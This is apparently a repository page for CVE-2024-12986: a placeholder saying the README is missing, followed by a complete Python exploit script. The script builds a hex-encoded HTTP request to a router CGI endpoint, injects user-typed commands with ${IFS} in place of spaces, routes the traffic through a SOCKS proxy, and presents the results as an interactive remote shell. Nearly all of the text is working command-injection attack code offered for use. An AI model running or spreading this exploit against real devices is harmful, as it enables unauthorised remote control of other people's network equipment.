README.md
README.md not found for CVE-2024-12986. The file may not exist in the repository.
import socket
import socks
# Predefined host and port
HOST = 'host'
PORT = 'port'
# ANSI escape sequences for color
RESET = "\033[0m"
GREEN = "\033[92m"
RED = "\033[91m"
BLUE = "\033[94m"
CYAN = "\033[96m"
YELLOW = "\033[93m"
def send_http_request(host_ip, host_port, request):
"""Sends the crafted HTTP request to the specified host and port."""
socket.socket = socks.socksocket
try:
print(f"{CYAN}Connecting to {host_ip}:{host_port}...{RESET}")
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(10)
s.connect((host_ip, host_port))
# Convert the request to binary
request = bytes.fromhex(request.decode())
print(f"{GREEN}Sending HTTP request...{RESET}")
s.sendall(request)
print(f"{GREEN}HTTP request sent successfully!{RESET}")
response = b""
while True:
data = s.recv(4096)
if not data:
break
response += data
return response.decode('utf-8', errors='replace')
except Exception as e:
print(f"{RED}An error occurred: {e}{RESET}")
return None
def start_shell():
"""Starts an interactive shell to accept commands."""
print(f"{BLUE}{'=' * 50}{RESET}")
print(f"{YELLOW}Interactive Shell Started{RESET}")
print(f"{YELLOW}Type your commands below. Type 'exit' to quit.{RESET}")
print(f"{BLUE}{'=' * 50}{RESET}")
while True:
command = input(f"{CYAN}shell>{RESET} ")
if command.lower() == 'exit':
print(f"{YELLOW}Exiting the shell. Goodbye!{RESET}")
break
# Replace spaces with ${IFS} for compatibility
command_with_ifs = command.replace(" ", "${IFS}")
payload_binary = (
b'474554202f6367692d62696e2f6d61696e66756e6374696f6e2e6367692f61706d63666775707074696d3f73657373696f6e3d7878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787830b425353224632535322463'
+ command_with_ifs.encode().hex().encode()
+ b'20485454502f312e300d0a0d0a'
)
# Send the crafted payload
response = send_http_request(HOST, PORT, payload_binary)
# Display the response
if response:
print(f"{BLUE}{'=' * 50}{RESET}")
print(f"{GREEN}HTTP response received:{RESET}")
print(f"{BLUE}{'=' * 50}{RESET}")
print(response)
print(f"{BLUE}{'=' * 50}{RESET}")
else:
print(f"{RED}No response received. Please check the host, port, or payload.{RESET}")
if __name__ == "__main__":
try:
start_shell()
except KeyboardInterrupt:
print(f"\n{YELLOW}Shell interrupted. Goodbye!{RESET}")